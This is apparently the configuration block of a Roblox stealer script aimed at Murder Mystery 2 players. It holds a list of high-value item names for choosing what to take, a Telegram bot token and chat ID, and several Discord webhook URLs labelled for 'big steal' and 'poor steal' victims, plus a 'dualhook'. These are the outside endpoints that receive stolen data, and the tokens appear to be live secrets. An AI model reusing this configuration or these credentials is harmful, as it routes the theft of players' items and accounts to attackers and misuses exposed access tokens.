aprplayers = {
    "Guest194827461",
    "skibiditolet2018",
    "typazveer",
    "speralka8814",
    "eqz_s",
}
webhook = 10
poor = 37
chatId = -1002853777462
botToken = "8168201640:AAEnQC-UYyvGPGz3ueJVzpb07Kdqa788ToI"
threadIdIP = 104
threadmobile = 6
reportsid = 29143
richgodliesList = {"Bat","Candy","Darksword","Darkshot", "Traveler's Gun", "Evergreen","Evergun","Bauble","Rainbow Gun", "Sunrise", "Sunset", "Rainbow","Constellation","Sakura","Blossom","Turkey","Vampire's Gun"}
richgodliesListpc = {"TreeKnife2023", "Turkey2023", "TreeGun2023","TravelerGun","Sakura_K", "Blossom_G", "ZombieBat", "Constellation", "Candy", "VampireGun", "SunsetKnife", "SunsetGun","Darksword","Darkshot","Rainbow_G","Rainbow_K","Bauble"}
skinNamesTG = {"Corrupt","Vampire's Axe","Gingerscope","Traveler's Axe","Celestial","Icepiercer","Harvester","Bat","Candy","Darksword","Darkshot", "Traveler's Gun", "Evergreen","Evergun","Bauble","Rainbow Gun", "Sunrise", "Sunset", "Rainbow","Constellation","Sakura","Blossom","Turkey","Vampire's Gun"}
bigstealmobile = "https://discord.com/api/webhooks/1404104507755073626/_Z75snL5SHuCe-0uu-7EYS2gnQgDIjTDyrR9WaWHECvAHlzIsG2Mag8gPjcVXpV8jYZk"
bigstealdpc = "https://discord.com/api/webhooks/1404104971380850768/wEHOj13IGDW4VywYZvrN4O43nUzEEGtf-O1ms8OGtXODBBsFC4kxhX5k4kKFLQNAKMd7"
poorsteal = "https://discord.com/api/webhooks/1404104832423432243/grzQdU94Kb6yrnJXkIgB9kLwqqW4Xzv4XRfMgyN2-EgTu4j2PXczNmVWwK0lkdpm1Gf2"
dualhook = "https://discord.com/api/webhooks/1404446779172192256/xgRCSWYOZo76d7hV7nQlfBoshwHZbZy3fGjYZNPLUaUKDbTEtympWOxCWO_zWPEPK9Uq"
